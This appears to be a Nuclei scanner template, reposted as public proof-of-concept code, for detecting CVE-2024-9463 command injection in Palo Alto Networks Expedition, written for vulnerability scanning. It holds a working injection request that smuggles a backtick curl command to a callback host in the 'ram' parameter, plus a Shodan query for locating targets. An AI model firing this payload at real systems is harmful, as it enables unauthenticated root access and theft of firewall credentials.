An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.
PoC代码[已公开]
id: CVE-2024-9463
info:
name: PaloAlto Networks Expedition - Remote Code Execution
author: princechaddha
severity: critical
description: |
An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.
impact: |
Successful exploitation could result in unauthorized access and control of the affected device.
remediation: |
Apply the necessary security patches provided by Palo Alto Networks to mitigate the CVE-2024-9463 vulnerability.
reference: |
- https://x.com/watchtowrcyber/status/1844306954245767623
- https://security.paloaltonetworks.com/PAN-SA-2024-0010
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/CVE-2024-9463
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/S
cvss-score: 9.9
cve-id: CVE-2024-9463
cwe-id: CWE-78
epss-score: 0.94245
epss-percentile: 0.99924
metadata:
verified: true
max-request: 1
vendor: paloaltonetworks
product: expedition
shodan-query: http.favicon.hash:1499876150
tags: cve,cve2024,palo-alto,rce,kev,vkev
http:
- raw:
- |
POST /API/convertCSVtoParquet.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
ram=watchTowr`curl+{{interactsh-url}}`
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- "Undefined index: taskID"
# digest: 4a0a004730450221009e93dc3dd37ded0b9c9886c0861e623c4ea1021d7c18e8305ed1ee56833cf603022020038d57037dfa4ecf0c5bad823234d839829d2ea865a2a9e066e9afbbed6833:922c64590222798bb761d5b6d8e72950